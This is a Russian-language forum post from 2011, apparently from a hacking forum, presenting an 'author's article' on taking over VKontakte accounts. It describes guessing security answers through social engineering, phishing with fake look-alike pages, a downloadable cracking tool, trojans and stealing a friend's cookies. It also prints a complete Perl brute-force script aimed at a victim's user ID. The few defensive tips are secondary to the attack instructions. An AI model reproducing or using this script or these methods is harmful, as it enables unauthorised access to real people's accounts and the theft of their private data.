ZK | Дата: Вторник, 13.12.2011, 15:28 | Сообщение # 1 |
Создатель топика
Участник форума
Вип-персона
Сообщений: 43
| Сегодня я поделюсь с вами авторской статьёй о способах взлома странички vkontakte.
О социальной сети ВКонтакте не слышал только, пожалуй, очень ленивый интернет пользователь. Понятно, что большинству известны и погрешности этого ресурса, особенно касательно взлома страниц. Эта статья посвящена способам взлома аккаунтов популярной сети и защите от подобных эксцессов. Способ первый - захватываем почту.
Взлом осуществляется различными способами. Наибольшей простотой отличается взлом посредством почты. Он особенно эффективен, если вы знакомы с владельцем заинтересовавшей вас страницы и когда вам известен адрес почты. В данном случае попробуйте дать ответ на секретный вопрос, что позволит завладеть доступом к аккаунту. Если ответите – прекрасно, в случае же неудачи поступите таким образом. Если почта зарегистрирована, к примеру, в Mail.ru, то задействуйте возможности <<Мой Мир>> - напишите что-то типа того, что на данном ресурсе вы новенький, и спросите что-то касательно установления ответа на вопрос. Можете не верить, но в большинстве случаев ответы очень похожи на, например, такой вариант: «Все будет нормально, не переживайте - мой вопрос требовал указать девичью фамилию матери, а я свой телефон вписал». Понятно, что этот метод не универсален, и для всех случаев он не подойдет. Чтобы защитить себя от подобных методов, всегда задавайте вопрос и отвечайте так, чтобы ни кому не удалось угадать ответ.
Название второго способа – фейк. Этот метод не так прост, как предыдущий, однако он более действенный. Фейком именуют страницу ВКонтакте, которая в действительности не существует, и только очень на нее похожа. Действовать надо так: подсовываете пользователю ссылку на данную страницу (отослав, например, в личные сообщения или по ICQ). Жертва, перейдя по ней, может ввести свой пароль и логин, не заметив подвоха и тем самым отдав доступ к своей странице вам. К сожалению, этот метод довольно сложен, так как не каждому под силу создать качественную страницу. Однако сегодня в сети можно найти готовые фейки, так что, если есть желание, сможете-таки взломать интересующий вас аккаунт. Вы, кстати, не забывайте, что никогда не следует посещать подобные страницы, просто автоматически отмечайте их как спам. Почаще смотрите в адресную строку – название сайта, к которому вы давно привыкли, может выглядеть, например, так: _http://vk0ntakte.ru.
Третий способ - взлом с помощью программ и брута. Пожалуй, способ взлома с помощью специализированной программы является как самым надёжным, так и самым доступным. Например, одну из таких программ для взлома можно скачать тут: _http://crack-icq.ru/programms/101-vk-hacker-novaya-programma-dlya-bystrogo-perebora-paroley-vkontakteru-.html
Также аккаунты взламывают при помощи перебора паролей, что среди определенного круга носит название «брут». Это требует наличия специального скрипта. Вашему вниманию предлагается вот такой перл. Написан он не мной, но является очень неплохим вариантом (проще говоря, это – программа, с помощью которой можно подобрать пароль). Код #!/usr/bin/perl
use IO::Socket; use MD5; use threads; use threads::shared; my @pass : shared;
###################################### $dic = ‘passl.txt’; #словарь паролей — сборник популярных паролей $id = 111111; #id цели $mail = ‘mail%40mail.com’; #Почта. @ должно быть заменено на %40 $threads = 4; #количество потоков ######################################
open (pass, ”<$dic”);
Next: @pass = pass();
for(0..$threads) {$trl[$_] = threads->create(\&Brut, $_);} for(@trl) { $_->join; }
sub Brut {
while
(@pass){
$pass = shift @pass;
$md5 = MD5->hexhash($pass); $sock = IO::Socket::INET->new(Proto=>’tcp’,PeerAddr=>’vkontakte.ru’,PeerPort=>80); print $sock ”HEAD http://vkontakte.ru/ HTTP/1.0\r\n”. ”Host: vkontakte.ru\r\n”. ”Accept: */*\r\n”. ”Content-Type: application/x-www-form-urlencoded\r\n”. ”User-Agent: Mozillo\r\n”. ”Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5\r\n”.
”Connection: close\r\n\r\n”; $answ = <$sock>; close $sock; print ”$pass $answ”; if ($answ =~ /302/){ open (good, ‘>>good.txt’); print good ”$id:$pass:$md5\n”; print ”$id:$pass:$md5\n”; close good; exit;} }
}
goto Next;
sub pass { my (@mas); while ( ){ push @mas, $_; last if (@mas == 400); } chomp @mas; return @mas; }
Нужно будет воспользоваться словарем паролей (файлом, имеющий формат txt). Лучше, если он будет максимально большим и двуязычным (английские и русские пароли). Однако этот метод обладает существенным недостатком: на взлом требуется много времени, и позитивный результат не всегда гарантирован. Что защитить себя от подобного способа, придумывайте только сложные пароли (например, TrO_12!олq). Никакой брут при наличие такого пароля не поможет.
Способ взлома №4: вирус Ну а наибольшей эффективностью отличается зверь по кличке «троян». Если удастся разместить на компьютере жертвы хороший троян, то он в очень скором времени отправит вам всю интересующую вас информацию. Но для создания такой программы нужно быть довольно неплохим специалистом. Однако данная проблема сегодня уже решена – достаточно скачать с сети интересующей троян с подробной инструкцией его использования. К сожалению, большинство троянов с легкостью определяются защитными программами. Кроме этого, что бы самому кому-то не подарить информацию, работайте с данными программами только тогда, когда интернет выключен.
5 способ. Cookies Ну и последний вариант предоставлен исключительно для смеха. «Развести» можно только друзей. Приходите к кому-то в гости, после чего незаметно садитесь за комп друга и скидываете себе на флешку его куки. Дома пользуетесь полученной информацией, и доступ к аккаунту приятеля у вас в кармане!
Для подбора паролей необходимо раздобыть эти самые пароли. С этой задачей отлично справляются специально написанные программы-генераторы. Ниже можете перейти по ссылке, которая направит вас к скачиванию трех популярных программ – PassGen 1.0, Passlist и еще какой-то.
|
|
| |